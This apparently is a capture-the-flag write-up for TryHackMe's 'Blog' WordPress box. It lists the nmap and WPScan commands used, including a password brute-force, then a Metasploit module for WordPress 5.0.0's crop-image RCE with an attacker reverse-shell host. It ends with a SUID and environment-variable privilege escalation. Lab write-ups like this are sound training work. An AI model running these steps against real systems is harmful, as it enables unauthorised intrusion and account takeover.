INTRODUCTION
Another excellent box from TryHackMe. This box was quite easy to compromise. It essentially involves standard wordpress enumeration procedures to get sufficient information in order to utilise a known vulnerability to gain low privileged shell access.
Privilege escalation is also quite easy but you will have to think a little bit outside the box.
Before we get started remember to add “blog.thm” in your hosts file “/etc/hosts”
ENUMERATION
For enumeration I used my normal methodology of first enumerating the top 50 ports using nmap while I run a full portscan in the background. This saves a lot of time.
sudo nmap — top-ports 50 -sC -sV <TARGET IP>
sudo nmap -p- <TARGET IP> — open
We notice that port 80 is open and its running Wordpress 5.0, so lets go take a look. http://blog.thm
By enumerating the page we see that its running Wordpress 5.0.0, so from here we will make use of WPScan, my default tool for wordpress enumeration.
wpscan — url http://blog.thm — enumerate ap,at,dbe,cb,u — detection-mode aggressive
Command Breakdown
- ap = All Plugins
- at = All Themes
- dbe = Database Exports
- cb = Config Backups
- u = Enumerate Users
- Detection-Mode = Since we’re not worried about being detected we can use aggressive mode which occasionally delivers more results at the cost of generating more noise.
Great, we have obtained two user names to use in order to bruteforce the Wordpress site also notice that XML-RPC is also available so we can use WPScan to bruteforce the site.
wpscan — url http://blog.thm -U <NAME 1>,<NAME 2> -P /usr/share/wordlists/<wordlist>
EXPLOITATION
Log into the Wordpress site using the following url “http://blog.thm/wp-admin” and the credentials obtained during enumeration.
Our enumeration process revealed that the system is running Wordpress 5.0.0, which has a known RCE vulnerability as per URL below
WordPress Core 5.0.0 — Crop-image Shell Upload (Metasploit) — PHP remote Exploit (exploit-db.com)
There’s also a python and javaScript exploits available for manual exploitation as per below urls
- WordPress 5.0.0 — Image Remote Code Execution — PHP webapps Exploit (exploit-db.com)
- WordPress Core 5.0 — Remote Code Execution — PHP webapps Exploit (exploit-db.com)
I felt lazy and decided to use Metasploit for the exploitation (will come back to the manual one later)
- msfconsole
- search wordpress 5.0
- use 0
set the following options
set PASSWORD = <OBTAINED PASSWORD>
set USERNAME = <OBTAINED USERNAME>
set RHOSTS = <TARGET IP>
set LHOST = <ATTACKER IP>
set LPORT = <LISTENING PORT>
run
PRIVILEGE ESCALATION
During my enumeration for Privilege Escalation I always check for binaries etc that may have the suid bit set, meaning it will execute as a privileged user depending on ownership etc.
Use the following command to obtain all items with the suid bit set.
find / type -f -perm -u=s 2>/dev/null
Running the file informs us that we are not admin users
/usr/sbin/checker
We can investigate the binary more by using either strace or ltrace as both is installed on the host.
ltrace /usr/sbin/checker
Based on the ltrace output it appears that the only check the application does is to check an environmental variable called admin for a value, lets test this theory by adding a value to the admin environmental variable
export admin=1
Now lets launch the ltrace process to check if we are successful
ltrace /usr/sbin/checker
Ok excellent that looks good as we can now see that the “admin” environment variable has a value of 1.
/usr/sbin/checker